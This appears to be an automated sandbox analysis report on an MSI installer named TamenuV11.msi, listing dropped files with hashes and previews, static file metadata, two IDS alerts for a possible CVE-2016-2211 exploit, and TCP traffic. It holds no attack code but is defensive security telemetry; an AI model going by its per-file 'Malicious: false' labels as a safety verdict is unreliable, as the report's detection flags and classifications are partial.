SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Setup\Local State (copy)

Download File

Process:	C:\Users\user\AppData\Local\Programs\Setup\Setup.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	434
Entropy (8bit):	5.681984697530585
Encrypted:	false
SSDEEP:	12:YKWSCuj9rrt+kqikex/71W3X2POTuMZjbqfAbGGnuq1:YKWJu5rrt5OmjRauMtbqfAvnX1
MD5:	BDA6DE0C17EE1DD484D8F32FD13F8BF1
SHA1:	955CBE024922055067049DE61F4C629B7CBEA5FC
SHA-256:	9E5F33B6E678437C6F01621A0A1D41CA1A53E9692D56ACE62D5831E1FE3BE2C6
SHA-512:	AFE4A31B464A90CB617A9C544D8C42183A4848DF6CD7F289F0165AAC8EE8AD718E068D670AF881A46958D6B803BDB61C1293978A3E3823B3D1E8AAAAE2E5CBDE
Malicious:	false
Preview:	{"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADwQak7XvJ7QYyYFY1Z2bJDEAAAABIAAABDAGgAcgBvAG0AaQB1AG0AAAAQZgAAAAEAACAAAACUpWLOjxKSyCNSLqbK4tqXo5HUsjpXkCsyd3vJrp76SgAAAAAOgAAAAAIAACAAAAC38z1RS5xhvzuVxbL8n9oXjgFVbJZhA/47WLw0P0JPzTAAAADr7omH6zhqBJbsCiW1ggOmx3EuLeT3Q+IjyDtX+9GlHBAwsNYVY7hIkkK8ky8DhFFAAAAA1+edph0uT5nEAYrhTgqjtFj0ctCGYk4qq+a8bMa8kCLzIikAjwEnYCwM7kDBXMxN2MHGsBVbo75KcOkbSLmq3g=="}}

C:\Users\user\AppData\Roaming\Setup\c626f3d6-8fdf-49f8-a5ac-7fcf42866423.tmp

Download File

Process:	C:\Users\user\AppData\Local\Programs\Setup\Setup.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	434
Entropy (8bit):	5.681984697530585
Encrypted:	false
SSDEEP:	12:YKWSCuj9rrt+kqikex/71W3X2POTuMZjbqfAbGGnuq1:YKWJu5rrt5OmjRauMtbqfAvnX1
MD5:	BDA6DE0C17EE1DD484D8F32FD13F8BF1
SHA1:	955CBE024922055067049DE61F4C629B7CBEA5FC
SHA-256:	9E5F33B6E678437C6F01621A0A1D41CA1A53E9692D56ACE62D5831E1FE3BE2C6
SHA-512:	AFE4A31B464A90CB617A9C544D8C42183A4848DF6CD7F289F0165AAC8EE8AD718E068D670AF881A46958D6B803BDB61C1293978A3E3823B3D1E8AAAAE2E5CBDE
Malicious:	false
Preview:	{"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADwQak7XvJ7QYyYFY1Z2bJDEAAAABIAAABDAGgAcgBvAG0AaQB1AG0AAAAQZgAAAAEAACAAAACUpWLOjxKSyCNSLqbK4tqXo5HUsjpXkCsyd3vJrp76SgAAAAAOgAAAAAIAACAAAAC38z1RS5xhvzuVxbL8n9oXjgFVbJZhA/47WLw0P0JPzTAAAADr7omH6zhqBJbsCiW1ggOmx3EuLeT3Q+IjyDtX+9GlHBAwsNYVY7hIkkK8ky8DhFFAAAAA1+edph0uT5nEAYrhTgqjtFj0ctCGYk4qq+a8bMa8kCLzIikAjwEnYCwM7kDBXMxN2MHGsBVbo75KcOkbSLmq3g=="}}

C:\Users\user\Desktop\Setup.lnk

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0, Read-Only, Archive, ctime=Sun Jul 28 17:50:32 2024, mtime=Sun Jul 28 11:18:24 2024, atime=Sun Jul 28 17:50:32 2024, length=172671488, window=hide
Category:	dropped
Size (bytes):	2234
Entropy (8bit):	3.922946141540356
Encrypted:	false
SSDEEP:	48:8wb4RyV4NA7/G4u9GdIkHYdu1xhykHUyF:8gcVT+YcfA+Uy
MD5:	BD89349D682D907C58A4CDE1072D23C7
SHA1:	F33747243762C3C8E7B67064947FA6C304FAC324
SHA-256:	82A248193923FBDCF5C5A2AD2972B211DFAF29A7B7860CFB484477A7126850D8
SHA-512:	A8F88A6D8399578B818DA5DD6B5036BA1CF516694E83DE65B1C7F84E0A3C94FCB43D14D433B54DF8DF359BB70E83C425D572AD33176777E0DC370F6B6B45A48B
Malicious:	false
Preview:	L..................F.@..!....L......E.>>.....L........J.......................:..DG..Yr?.D..U..k0.&...&......vk.v.......2....p.+>........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.XDb...........................%..A.p.p.D.a.t.a...B.P.1......XFb..Local.<......CW.^.XFb....b.....................!...L.o.c.a.l.....Z.1......XHb..Programs..B.......XFb.XHb.........................._...P.r.o.g.r.a.m.s.....P.1......XLb..Setup.<.......XHb.XLb....s.......................%.S.e.t.u.p.....\.2...J..XP.!.Setup.exe.D.......XP..XIb....{.........................S.e.t.u.p...e.x.e.......d...............-.......c....................C:\Users\user\AppData\Local\Programs\Setup\Setup.exe..).....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.P.r.o.g.r.a.m.s.\.S.e.t.u.p.\.S.e.t.u.p...e.x.e.,.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.P.r.o.g.r.a.m.s.\.S.e.t.u.p.\.g.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.I.n.s.t.a.l.l.e.r.\.{.8.C.7.A.0.

C:\Windows\Installer\48ea52.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Setup, Author: Unity, Keywords: Installer, Comments: This installer database contains the logic and data required to install Setup., Template: x64;1033, Revision Number: {AE886136-226A-468E-98F9-6C40EB8B03A3}, Create Time/Date: Sun Jul 28 12:50:32 2024, Last Saved Time/Date: Sun Jul 28 12:50:32 2024, Number of Pages: 500, Number of Words: 2, Name of Creating Application: WiX Toolset (4.0.0.5512), Security: 2
Category:	dropped
Size (bytes):	91316224
Entropy (8bit):	7.999690087676509
Encrypted:	true
SSDEEP:	1572864:Dq4scAmImPA51sQjH8pRu5gWKZKZdJtaC2aMJghM7X375DMcdJEYmGl:Dqj9siXcpR0K8jtaHa9hEX3757dHmG
MD5:	BFD21C5D760A0CF2FD14D6648C60A18B
SHA1:	CC62D9E2759CC5147146B6173EF2895C6E5EC60A
SHA-256:	34148411A1B67E5CC5AF2997F0413EDBD6E05C5784899A73ACB50A84125D009F
SHA-512:	BA6E983A32446B8B1D2CB0E0B3B9E72DBE7F6E100A6463BC9F7E9C4E2BDDA67C1AFC395B4C0DC7B395CBE9B931BF9DE15AE5C887B21AEB06A639A98D869E0D9B
Malicious:	false
Preview:	......................>.................................................................................... ...$...(...,...0...4...8...<...@...D...H...L...P...T......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\48ea54.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Setup, Author: Unity, Keywords: Installer, Comments: This installer database contains the logic and data required to install Setup., Template: x64;1033, Revision Number: {AE886136-226A-468E-98F9-6C40EB8B03A3}, Create Time/Date: Sun Jul 28 12:50:32 2024, Last Saved Time/Date: Sun Jul 28 12:50:32 2024, Number of Pages: 500, Number of Words: 2, Name of Creating Application: WiX Toolset (4.0.0.5512), Security: 2
Category:	dropped
Size (bytes):	91316224
Entropy (8bit):	7.999690087676509
Encrypted:	true
SSDEEP:	1572864:Dq4scAmImPA51sQjH8pRu5gWKZKZdJtaC2aMJghM7X375DMcdJEYmGl:Dqj9siXcpR0K8jtaHa9hEX3757dHmG
MD5:	BFD21C5D760A0CF2FD14D6648C60A18B
SHA1:	CC62D9E2759CC5147146B6173EF2895C6E5EC60A
SHA-256:	34148411A1B67E5CC5AF2997F0413EDBD6E05C5784899A73ACB50A84125D009F
SHA-512:	BA6E983A32446B8B1D2CB0E0B3B9E72DBE7F6E100A6463BC9F7E9C4E2BDDA67C1AFC395B4C0DC7B395CBE9B931BF9DE15AE5C887B21AEB06A639A98D869E0D9B
Malicious:	false
Preview:	......................>.................................................................................... ...$...(...,...0...4...8...<...@...D...H...L...P...T......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIFB59.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	61415
Entropy (8bit):	7.463523665200499
Encrypted:	false
SSDEEP:	1536:pkeOPegMWG6lmzbev2r5dwP10V2mvbUYgTmV:pfIVZGGv2r4a2cbUlTmV
MD5:	D89A7F829501B1B6BC15A409CE479CEF
SHA1:	7EF04F913B88FCE76A2E2977DB20C3C56DA88B32
SHA-256:	4E69D3FD6487B5F817115D21D31747315776299698FC87F5CA4F5F4469D6E9AE
SHA-512:	777952D695FF53C5137756E5F2F7222576FB48C8A4F06D3804568EB35B4AF8781CDE6401924D60FA1918FE0B8FF546E060BEBCFE8E2C499E950C16A9037BECDF
Malicious:	false
Preview:	...@IXOS.@.....@HB.X.@.....@.....@.....@.....@.....@......&.{8C7A072A-3005-48F5-AE5F-6D02D608DF59}..Setup..TamenuV11.msi.@.....@.....@.....@......SetupIcon.exe..&.{AE886136-226A-468E-98F9-6C40EB8B03A3}.....@.....@.....@.....@.......@.....@.....@.......@......Setup......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@L....@.....@.]....&.{6534B6CF-7B99-59A0-8481-3A9A915491B7}@.C:\Users\user\AppData\Local\Programs\Setup\LICENSE.electron.txt.@.......@.....@.....@......&.{D3019177-A881-5C50-A05E-B6C771301850}B.C:\Users\user\AppData\Local\Programs\Setup\LICENSES.chromium.html.@.......@.....@.....@......&.{DB9B5920-54F6-5361-A7D1-76FB76EF066E}B.C:\Users\user\AppData\Local\Programs\Setup\chrome_100_percent.pak.@.......@.....@.....@......&.{28009B83-8EE6-5693-B33E-21509BAB6AE8}B.C:\Users\user\AppData\Local\Programs\Setup\chrome_200_percent.pak.@.......@.....@.....@......&.{4DD57

C:\Windows\Installer\SourceHash{8C7A072A-3005-48F5-AE5F-6D02D608DF59}

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.1630407144808328
Encrypted:	false
SSDEEP:	12:JSbX72FjXNJiAGiLIlHVRpiBh/7777777777777777777777777vDHFyRs0qp7lN:JAQI5A4dF
MD5:	5985C3A9CC0D9A0D122BCEADD4C2B181
SHA1:	9DE8D545254BD3D1108F99D19D7E1FDD44F6AE42
SHA-256:	F0A36DECE8E57CC1B5CC87B51C12896A29DC8329B23600537EC803D400414E5F
SHA-512:	A07041F36E701C4E4F19E6596A886395953B2FCA3E5B3B275C14DA26DF1F72A6C6EDC78A5AA682247B9526839AFC6E4B45735464661C7F84E387DD6224A22F47
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.482406360253582
Encrypted:	false
SSDEEP:	48:68Ph2uRc06WXJanT5Y9YuG9GxS5oMrP9GxSIrmUH:Fh21RnTGZNHWu
MD5:	C164507C0EB7B576F762C904FD44A50B
SHA1:	AC4842E09F5039D8BBC9ED42167CDDFF63FA918A
SHA-256:	2B15BFC4D1F9AB0FE6B35DC0A3459BDB31B914B469BCA71E9F679C96F4B8950C
SHA-512:	46ECF7AC91117C10762B6D7D260F00DD457472F035A3FE4CE8DF60F3FA032997CA517D9638FCC69F779525CEB62DCCB750F8603114174343FDA4CD073C0A6F4A
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	432221
Entropy (8bit):	5.375174743368337
Encrypted:	false
SSDEEP:	1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgaua:zTtbmkExhMJCIpErj
MD5:	37E47C91FEDF33350DC67BAAB2C64FBB
SHA1:	2BC1F71AA1426F1D41FBA7853C6DAD2CB1D4B684
SHA-256:	FD6E0189FEC306F1DE8CB234594EA7918432AE7B2C5827EA724C87E00A74109F
SHA-512:	F66D6832939C4F32DD744427AC4AC40E48A0A18DE685E7D82337B8AEE3E2DF9E477A19B0AE26D8DC89808B7DF7101F75925DFE43312746D2955DB043D7CA5339
Malicious:	false
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

C:\Windows\Temp\~DF03B8CCCED5CB7AC4.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.1929711763711013
Encrypted:	false
SSDEEP:	48:Xneu3NveFXJpT5m9YuG9GxS5oMrP9GxSIrmUH:3ezRTUZNHWu
MD5:	6D3DB4FCB66DBC55F7B59D70DB7ABFD9
SHA1:	32321E399D2C668F030F89BD8C395DF9AE6D11AD
SHA-256:	1839D72AC7496F969065153BF91FE82C78AE5B06853E67B0EABF8DC736937E95
SHA-512:	BFF60E2C0C3D43D2132556ED20C1FA0A476116DBA6125D44CE0D108889A572D3F93015A30F4865890D3D8AFF3750EEAE7ACB25120B58E5B9C882F1F64D894F0E
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF055644D4441D4E81.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF147F6308B7F68B67.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF187760FBE62760F1.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.07069263405596087
Encrypted:	false
SSDEEP:	6:2/9LG7iVCnLG7iVrKOzPLHKOy1jx6Yvs06Y/tiVky6l7:2F0i8n0itFzDHFyRs0D7
MD5:	2486553E812F8907723DF2BFFE0B1DFA
SHA1:	CCD9733F5DFE28C2794748EFC3B4B9D8BC285124
SHA-256:	526C6587FC6130222CC8CD8469057FA3F64E2099D13506CD27AF4B23491E3D71
SHA-512:	B41246882908519F0E0D71A425CDF0C2EB8A343EB1B67351286194EB558470FB41C3693BE85B135FFE05676B96A9091D58B5D6888ABB354EC7DD36D7A8DFBB3D
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF31537DAD71E3C251.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.482406360253582
Encrypted:	false
SSDEEP:	48:68Ph2uRc06WXJanT5Y9YuG9GxS5oMrP9GxSIrmUH:Fh21RnTGZNHWu
MD5:	C164507C0EB7B576F762C904FD44A50B
SHA1:	AC4842E09F5039D8BBC9ED42167CDDFF63FA918A
SHA-256:	2B15BFC4D1F9AB0FE6B35DC0A3459BDB31B914B469BCA71E9F679C96F4B8950C
SHA-512:	46ECF7AC91117C10762B6D7D260F00DD457472F035A3FE4CE8DF60F3FA032997CA517D9638FCC69F779525CEB62DCCB750F8603114174343FDA4CD073C0A6F4A
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF3E43AD8107F2BFEE.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.1929711763711013
Encrypted:	false
SSDEEP:	48:Xneu3NveFXJpT5m9YuG9GxS5oMrP9GxSIrmUH:3ezRTUZNHWu
MD5:	6D3DB4FCB66DBC55F7B59D70DB7ABFD9
SHA1:	32321E399D2C668F030F89BD8C395DF9AE6D11AD
SHA-256:	1839D72AC7496F969065153BF91FE82C78AE5B06853E67B0EABF8DC736937E95
SHA-512:	BFF60E2C0C3D43D2132556ED20C1FA0A476116DBA6125D44CE0D108889A572D3F93015A30F4865890D3D8AFF3750EEAE7ACB25120B58E5B9C882F1F64D894F0E
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF81E08AA1EB2772A1.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.1929711763711013
Encrypted:	false
SSDEEP:	48:Xneu3NveFXJpT5m9YuG9GxS5oMrP9GxSIrmUH:3ezRTUZNHWu
MD5:	6D3DB4FCB66DBC55F7B59D70DB7ABFD9
SHA1:	32321E399D2C668F030F89BD8C395DF9AE6D11AD
SHA-256:	1839D72AC7496F969065153BF91FE82C78AE5B06853E67B0EABF8DC736937E95
SHA-512:	BFF60E2C0C3D43D2132556ED20C1FA0A476116DBA6125D44CE0D108889A572D3F93015A30F4865890D3D8AFF3750EEAE7ACB25120B58E5B9C882F1F64D894F0E
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF911AA3ED5DCD1FB4.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF9171784A3A975B1C.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.482406360253582
Encrypted:	false
SSDEEP:	48:68Ph2uRc06WXJanT5Y9YuG9GxS5oMrP9GxSIrmUH:Fh21RnTGZNHWu
MD5:	C164507C0EB7B576F762C904FD44A50B
SHA1:	AC4842E09F5039D8BBC9ED42167CDDFF63FA918A
SHA-256:	2B15BFC4D1F9AB0FE6B35DC0A3459BDB31B914B469BCA71E9F679C96F4B8950C
SHA-512:	46ECF7AC91117C10762B6D7D260F00DD457472F035A3FE4CE8DF60F3FA032997CA517D9638FCC69F779525CEB62DCCB750F8603114174343FDA4CD073C0A6F4A
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFA2C8F8CCF4574FCC.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFF3C8D95475A34063.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFF43EE97D80F6FDD0.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	0.11097045133154312
Encrypted:	false
SSDEEP:	24:lI3OHszJfAeb709GxipVk09GxipV7V2BwGKlrkgSKs+n+Mr:FHszrA9GxS39GxS5oMrvsY9
MD5:	9F9FF61646DF9C4A86295CB9B44BBB59
SHA1:	B4EE2D88B469DD47ECAF177A2C375A0257B3FC58
SHA-256:	14A877EBCA6D30C444FBADD764B352C69E744E202ACF4C8FF99FF612F7C00537
SHA-512:	4012D024A42F07B24193CC4F8D578B778B58F2F5B96614608359511A4C913FFEB6661BD149DE1F59CDFAFE5F5FC25498FCF12ED5C2072C5061F7AC572A7F2FD3
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Setup, Author: Unity, Keywords: Installer, Comments: This installer database contains the logic and data required to install Setup., Template: x64;1033, Revision Number: {AE886136-226A-468E-98F9-6C40EB8B03A3}, Create Time/Date: Sun Jul 28 12:50:32 2024, Last Saved Time/Date: Sun Jul 28 12:50:32 2024, Number of Pages: 500, Number of Words: 2, Name of Creating Application: WiX Toolset (4.0.0.5512), Security: 2
Entropy (8bit):	7.999690087676509
TrID:	Microsoft Windows Installer (60509/1) 88.31% Generic OLE2 / Multistream Compound File (8008/1) 11.69%
File name:	TamenuV11.msi
File size:	91'316'224 bytes
MD5:	bfd21c5d760a0cf2fd14d6648c60a18b
SHA1:	cc62d9e2759cc5147146b6173ef2895c6e5ec60a
SHA256:	34148411a1b67e5cc5af2997f0413edbd6e05c5784899a73acb50a84125d009f
SHA512:	ba6e983a32446b8b1d2cb0e0b3b9e72dbe7f6e100a6463bc9f7e9c4e2bdda67c1afc395b4c0dc7b395cbe9b931bf9de15ae5c887b21aeb06a639a98d869e0d9b
SSDEEP:	1572864:Dq4scAmImPA51sQjH8pRu5gWKZKZdJtaC2aMJghM7X375DMcdJEYmGl:Dqj9siXcpR0K8jtaHa9hEX3757dHmG
TLSH:	6D18336330E39E5DF889BB77983F9CC689000D95B915693F6925F488E5F2F700728B86
File Content Preview:	........................>.................................................................................... ...$...(...,...0...4...8...<...@...D...H...L...P...T.............................................................................................

File Icon


Icon Hash:	2d2e3797b32b2b99

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-28T14:19:11.040670+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49743	20.114.59.183	192.168.2.4
2024-07-28T14:18:31.480828+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49730	20.114.59.183	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 28, 2024 14:18:46.690608978 CEST	49741	443	192.168.2.4	172.64.41.3
Jul 28, 2024 14:18:46.690690994 CEST	443	49741	172.64.41.3	192.168.2.4
Jul 28, 2024 14:18:46.690762043 CEST	49741	443	192.168.2.4	172.64.41.3
Jul 28, 2024 14:18:46.704019070 CEST	49741	443	192.168.2.4	172.64.41.3
Jul 28, 2024 14:18:46.704099894 CEST	443	49741	172.64.41.3	192.168.2.4
Jul 28, 2024 14:18:47.176470995 CEST	443	49741	172.64.41.3	192.168.2.4
Jul 28, 2024 14:18:47.199500084 CEST	49741	443	192.168.2.4	172.64.41.3
Jul 28, 2024 14:18:47.199532032 CEST	443	49741	172.64.41.3	192.168.2.4
Jul 28, 2024 14:18:47.200674057 CEST	443	49741	172.64.41.3	192.168.2.4
Jul 28, 2024 14:18:47.200738907 CEST	49741	443	192.168.2.4	172.64.41.3
Jul 28, 2024 14:18:47.209441900 CEST	49741	443	192.168.2.4	172.64.41.3
Jul 28, 2024 14:18:47.209510088 CEST	443	49741	172.64.41.3	192.168.2.4
Jul 28, 2024 14:18:47.286288977 CEST	49741	443	192.168.2.4	172.64.41.3
Jul 28, 2024 14:18:47.286300898 CEST	443	49741	172.64.41.3	192.168.2.4
Jul 28, 2024 14:18:47.395674944 CEST	49741	443	192.168.2.4	172.64.41.3
Jul 28, 2024 14:18:52.649851084 CEST	49742	443	192.168.2.4	162.159.61.3
Jul 28, 2024 14:18:52.649938107 CEST	443	49742	162.159.61.3	192.168.2.4
Jul 28, 2024 14:18:52.650013924 CEST	49742	443	192.168.2.4	162.159.61.3
Jul 28, 2024 14:18:52.650248051 CEST	49742	443	192.168.2.4	162.159.61.3
Jul 28, 2024 14:18:52.650271893 CEST	443	49742	162.159.61.3	192.168.2.4
Jul 28, 2024 14:18:53.136116028 CEST	443	49742	162.159.61.3	192.168.2.4
Jul 28, 2024 14:18:53.238346100 CEST	49742	443	192.168.2.4	162.159.61.3
Jul 28, 2024 14:18:53.238390923 CEST	443	49742	162.159.61.3	192.168.2.4
Jul 28, 2024 14:18:53.240408897 CEST	443	49742	162.159.61.3	192.168.2.4
Jul 28, 2024 14:18:53.240430117 CEST	443	49742	162.159.61.3	192.168.2.4
Jul 28, 2024 14:18:53.240495920 CEST	49742	443	192.168.2.4	162.159.61.3
Jul 28, 2024 14:18:53.242733002 CEST	49742	443	192.168.2.4	162.159.61.3
